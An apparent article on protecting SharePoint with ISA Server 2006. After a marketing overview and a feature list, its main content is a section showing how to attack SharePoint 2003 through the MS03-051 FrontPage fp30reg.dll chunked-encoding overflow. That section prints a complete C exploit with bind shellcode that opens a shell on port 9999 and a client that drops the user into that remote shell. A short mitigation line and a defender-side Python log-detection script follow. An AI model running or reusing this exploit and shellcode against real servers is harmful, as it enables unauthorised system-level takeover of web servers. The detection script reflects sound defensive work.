Overview and Features: ISA Server and SharePoint

* This article was written in the context of Internet Security and Acceleration (ISA) 2006, a technology now considered deprecated with the introduction of Forefront Threat Management Gateway (TMG). Variations may exist. *

Overview

Microsoft Internet Security and Acceleration (ISA) Server can complement your collaboration and communications environment by providing a SharePoint-aware firewall, analysis of possible threats in your SharePoint traffic, and a secure VPN architecture, allowing your organization to remain secure while providing robust channels for serving SharePoint. By leveraging ISA Server, you can securely provide an extranet implementation as well as protect against possible internal threats. Serving SharePoint externally is a beneficial way of establishing collaboration and communication with business partners, customers, and even remote divisions. By planning, designing, and implementing a secure environment using ISA Server, you can ensure that your SharePoint data is only available to the right people.

The security of your SharePoint environment is only as good as the tools that you give your SharePoint and systems administrators. Through an intuitive user interface, you give the people responsible for the health of your portal security configuration wizards, advanced monitoring tools, and a central location for managing SharePoint network access.

Protecting your SharePoint environment involves many processes; however, using ISA Server can help simplify your goals. Serving your SharePoint environment entails controlling the flow of your SharePoint business data as it moves back and forth between your company and an external partner. ISA Server provides facilities through which your SharePoint packets pass through a secured network circuit and application-layer proxy services.

It is important that SharePoint isn’t serving when it doesn’t need to be, and that connections are dropped immediately after an employee or customer is done. Using ISA Server allows the ports that SharePoint uses to be opened and closed dynamically using the technology described above, ensuring your portal’s security.

It is increasingly common to use SharePoint to store various file formats and to integrate it with several differing technologies, all of which carry their own security implications. Using the advanced circuit filtering provided by ISA Server, it is possible to integrate and distribute these varying application files while ensuring that your portal’s integrity is maintained. Just as the applications vary, so will the protocols that are often associated with them (for example, integrating POP3 email account access into your SharePoint portal). ISA Server provides the means to control all of these types of traffic, making it straightforward to ensure that only the appropriate system services are serving the right data.

SharePoint can also be rather slow to load over an external connection, for a variety of reasons. However, using the advanced web cache acceleration features in ISA Server, it is possible to reduce the time it takes your SharePoint portal to load and be ready for employee use, increasing overall efficiency.

Features

  • A new, simplified user interface
  • Support for multiple networks
  • Improved VPN support
  • VPN quarantine capabilities
  • Ability to create custom firewall user groups
  • More extensive protocol support
  • Customized protocol definitions
  • OWA Publishing Wizard
  • Improved support for FTP upload/download policy
  • Improved Web publishing
  • Port redirection for server publishing rules
  • Improved cache rules for centralized object storage
  • Path mapping for Web publishing rules
  • RADIUS support for Web proxy client authentication
  • Delegation of basic authentication
  • SecurID authentication
  • Firewall-generated forms (forms-based authentication)
  • Improved SMTP Message Screener
  • Improved HTTP filtering
  • Link translation
  • Improved monitoring and reporting

Example Attack on SharePoint 2003 With Chunked Encoding and Overflow

In this article I will show how an attacker might maliciously enter a SharePoint 2003 environment (this won’t work on MOSS) using some checks and exploitation techniques. The code is pretty self-explanatory.

Most Microsoft hackers will note that the default installation directories, as discussed in other articles, are the quickest way to get hold of a SharePoint site. However, there is other interesting information that can be gathered from the host before you begin your attack, as well as help in facilitating the takeover, by using some pretty common IIS exploits. Firstly, most attackers will execute a simple buffer overflow on the target host; this will in some cases allow the execution of arbitrary code on the server. The ultimate goal in this case would be to trip a remote buffer overrun due to a flaw in FrontPage Server Extensions (if the host is using ClickOnce for application deployment, these are enabled as well). When we complete the overflow we should then have local system rights on the server; maybe we can even get a new account created so we can visit this server later and see if it can’t be a bridge for us to other systems. We first have to send a chunked-encoded request to our host, which should result in output somewhat like:

————————————————————————
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 2002
Description:
Out of process application ‘/LM/W3SVC/1/ROOT’ terminated unexpectedly.
————————————————————————

You should be able to find this in the event log following our attack on the SharePoint site. Our request will look something like POST /_vti_bin/_vti_aut/fp30reg.dll. A chunked-encoded POST will result in control of ECX and EDI, with the exception occurring at a mov dword ptr [ECX+4],EDI instruction, leading to remote command execution with the privileges associated with the IWAM_machinename account.

We are just going to execute a little code in order to fully trip the overflow and see if we can’t get into the server (see code at bottom of this article).

If you want to eliminate this vulnerability, just use the IIS lockdown tool to disable the extensions properly.

[c]
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>
#pragma comment(lib,"ws2_32")
#define VER "0.1"
/******** bind shellcode spawns persistent shell on port 9999 *****************************/
unsigned char kyrgyz_bind_code[] = {
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};

void cmdshell(SOCKET sock);
unsigned long gimmeip(char *hostname);

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    struct sockaddr_in targetTCP;
    SOCKET sockTCP;
    int s;
    unsigned short port = 80;
    unsigned long ip;
    char header[] = "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
    char packet[3000], data[1500];
    unsigned char ecx[] = "\xe0\xf3\xd4\x67";
    unsigned char edi[] = "\xff\xd0\x90\x90";
    unsigned char call[] = "\xe4\xf3\xd4\x67"; /* overwrite .data section of fp30reg.dll */
    unsigned char shortjmp[] = "\xeb\x10";

    printf("\n -={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n"
           " > \n", VER);
    if (argc < 2)
    {
        printf("\n Usage: %s [Target]\n"
               " eg: fp30reg.exe 192.168.63.130\n", argv[0]);
        return 1;
    }
    if (argc == 3)
        port = (unsigned short)atoi(argv[2]);

    WSAStartup(0x0202, &wsaData);
    printf("[*] Target: %s Port: %d\n", argv[1], port);
    ip = gimmeip(argv[1]);
    memset(&targetTCP, 0, sizeof(targetTCP));
    memset(packet, 0, sizeof(packet));
    targetTCP.sin_family = AF_INET;
    targetTCP.sin_addr.s_addr = ip;
    targetTCP.sin_port = htons(port);

    /* request line plus headers; the body is sent chunked */
    sprintf(packet, "%sHost: %s\r\nTransfer-Encoding: chunked\r\n", header, argv[1]);

    /* NOP sled with the register overwrites, short jump and shellcode placed at fixed offsets */
    memset(data, 0x90, sizeof(data) - 1);
    data[sizeof(data) - 1] = '\0';
    memcpy(&data[16], edi, sizeof(edi) - 1);
    memcpy(&data[20], ecx, sizeof(ecx) - 1);
    memcpy(&data[250 + 10], shortjmp, sizeof(shortjmp) - 1);
    memcpy(&data[250 + 14], call, sizeof(call) - 1);
    memcpy(&data[250 + 70], kyrgyz_bind_code, sizeof(kyrgyz_bind_code));

    /* append to packet rather than passing packet as its own source to sprintf */
    sprintf(packet + strlen(packet), "Content-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",
            (int)strlen(data), (unsigned int)strlen(data), data);

    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
    {
        printf("[x] Socket not initialized! Exiting...\n");
        WSACleanup();
        return 1;
    }
    printf("[*] Socket initialized...\n");
    if (connect(sockTCP, (struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
        printf("[*] Connection to host failed! Exiting...\n");
        WSACleanup();
        exit(1);
    }
    printf("[*] Checking for presence of fp30reg.dll...");
    if (send(sockTCP, packet, (int)strlen(packet), 0) == SOCKET_ERROR)
    {
        printf("[x] Failed to inject packet! Exiting...\n");
        WSACleanup();
        return 1;
    }
    memset(packet, 0, sizeof(packet));
    if (recv(sockTCP, packet, sizeof(packet), 0) == SOCKET_ERROR)
    {
        printf("[x] Failed to receive packet! Exiting...\n");
        WSACleanup();
        return 1;
    }
    /* "HTTP/1.1 100 Continue" means the DLL accepted the chunked POST */
    if (packet[9] == '1' && packet[10] == '0' && packet[11] == '0')
        printf(" Found!\n");
    else
    {
        printf(" Not Found!! Exiting...\n");
        WSACleanup();
        return 1;
    }
    printf("[*] Packet injected!\n");
    closesocket(sockTCP);
    printf("[*] Sleeping ");
    for (s = 0; s < 13000; s += 1000)
    {
        printf(".");
        fflush(stdout);
        Sleep(1000);
    }
    printf("\n[*] Connecting to host: %s on port 9999\n", argv[1]);
    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
    {
        printf("\n[x] Socket not initialized! Exiting...\n");
        WSACleanup();
        return 1;
    }
    targetTCP.sin_family = AF_INET;
    targetTCP.sin_addr.s_addr = ip;
    targetTCP.sin_port = htons(9999);
    if (connect(sockTCP, (struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
        printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n");
        WSACleanup();
        exit(1);
    }
    printf("\n[*] Dropping to shell...\n");
    cmdshell(sockTCP);
    return 0;
}
/*********************************************************************************/
/* relay between local stdin/stdout and the remote socket */
void cmdshell(SOCKET sock)
{
    struct timeval tv;
    fd_set readfds;
    int length;
    char buffer[1000];

    while (1)
    {
        tv.tv_sec = 1;
        tv.tv_usec = 0;
        FD_ZERO(&readfds);
        FD_SET(sock, &readfds);
        length = select(0, &readfds, NULL, NULL, &tv);
        if (length == 1)
        {
            length = recv(sock, buffer, sizeof(buffer), 0);
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
            length = _write(1, buffer, length);
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
        }
        else
        {
            length = _read(0, buffer, sizeof(buffer));
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
            length = send(sock, buffer, length, 0);
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
        }
    }
}
/*********************************************************************************/
/* accept either a dotted-quad address or a hostname */
unsigned long gimmeip(char *hostname)
{
    struct hostent *he;
    unsigned long ipaddr;

    if ((ipaddr = inet_addr(hostname)) == INADDR_NONE)
    {
        if ((he = gethostbyname(hostname)) == NULL)
        {
            printf("[x] Failed to resolve host: %s! Exiting...\n", hostname);
            WSACleanup();
            exit(1);
        }
        memcpy(&ipaddr, he->h_addr, he->h_length);
    }
    return ipaddr;
}
[/c]
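As an added defender-side example (not code from the original article), the following Python scans IIS 6 W3C log lines for the POST to /_vti_bin/_vti_aut/fp30reg.dll described above and correlates each one with a W3SVC Event ID 2002 crash that follows shortly after. The log field order assumes the default IIS 6 W3C layout, and the sample log lines and crash timestamps are constructed.

```python
from datetime import datetime, timedelta

# Default IIS 6 W3C extended log field order (assumed; check the #Fields: line of your logs).
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status",
          "sc-substatus", "sc-win32-status"]
TARGET = "/_vti_bin/_vti_aut/fp30reg.dll"

def parse_iis_line(line):
    """Return a dict for one W3C log line, or None for comment/blank/short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
    return rec

def suspicious_requests(lines):
    """POSTs to the FrontPage fp30reg.dll endpoint; the path match is case-insensitive."""
    hits = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec and rec["cs-method"] == "POST" and rec["cs-uri-stem"].lower().endswith(TARGET):
            hits.append(rec)
    return hits

def correlate_with_crashes(hits, crash_times, window_sec=30):
    """Pair each hit with any W3SVC 2002 crash logged within window_sec after it."""
    paired = []
    for rec in hits:
        for crash in crash_times:
            if timedelta(0) <= crash - rec["ts"] <= timedelta(seconds=window_sec):
                paired.append((rec["c-ip"], rec["ts"], crash))
    return paired

# Constructed sample log lines (not real traffic); IIS writes spaces in fields as '+'.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status",
    "2009-04-01 10:15:02 10.0.0.5 GET /default.aspx - 80 - 10.0.0.77 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0",
    "2009-04-01 10:15:09 10.0.0.5 POST /_vti_bin/_vti_aut/FP30REG.DLL - 80 - 10.0.0.99 - 500 0 0",
    "2009-04-01 10:15:40 10.0.0.5 GET /_layouts/settings.aspx - 80 CORP\\alice 10.0.0.77 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0",
]
# Constructed timestamps of W3SVC Event ID 2002 entries taken from the application event log.
SAMPLE_CRASHES = [datetime(2009, 4, 1, 10, 15, 12)]
```

A single hit paired with a 2002 event a few seconds later is the signature to alert on; a hit with no crash still deserves a look, since it means the DLL is reachable from that client.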
